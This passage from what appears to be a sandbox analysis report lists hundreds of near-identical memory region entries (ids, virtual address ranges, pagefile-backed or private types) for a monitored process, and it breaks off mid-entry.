end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14312 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14313 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14314 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14315 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14316 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14317 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14318 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14319 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14320 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14321 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14322 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14323 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14324 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14325 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14326 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14327 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14328 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14329 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 14330 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14331 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14332 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14333 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 14334 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14335 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14336 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14337 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14338 start_va = 0x1ec0000 end_va = 0x1ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 14339 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14340 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14341 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14342 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14343 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14344 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14345 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14346 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14347 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14348 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14349 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14350 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14351 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14352 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14353 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14354 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14355 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14356 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14357 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14358 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14359 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14360 start_va = 0x1ec0000 end_va = 0x1ecefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 14361 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14362 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14363 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14364 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14365 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14366 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14367 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14368 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14369 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14370 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14371 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14372 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14373 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14374 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14375 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14376 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14377 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14378 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14379 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14380 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14381 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14382 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14383 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14384 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14385 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14386 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14387 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14388 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14389 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14390 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14391 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14392 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14393 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14394 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14395 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14396 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14397 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14398 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14399 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14400 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14401 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14402 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14403 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14404 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14405 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14406 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14407 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14408 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 14409 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14410 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14411 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14412 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14413 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14414 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14415 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14416 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14417 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14418 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14419 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14420 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14421 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14422 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14423 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14424 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14425 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14426 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14427 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14428 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14429 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14430 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14431 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14432 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14433 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14434 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14435 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14436 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14437 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14438 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14439 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14440 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14441 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14442 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14443 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14444 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14445 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14446 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14447 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14448 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14449 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 14450 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14451 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14452 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14453 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 14454 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14455 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14456 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14457 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 14458 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 14459 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 14460 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14461 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14462 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14463 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14464 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14465 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14466 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14467 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14468 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14469 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14470 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14471 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14472 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14473 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14474 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14475 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14476 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14477 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14478 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14479 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14480 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14481 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14482 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14483 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14484 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14485 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14486 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14487 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14488 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14489 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14490 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14491 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14492 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14493 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 14494 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 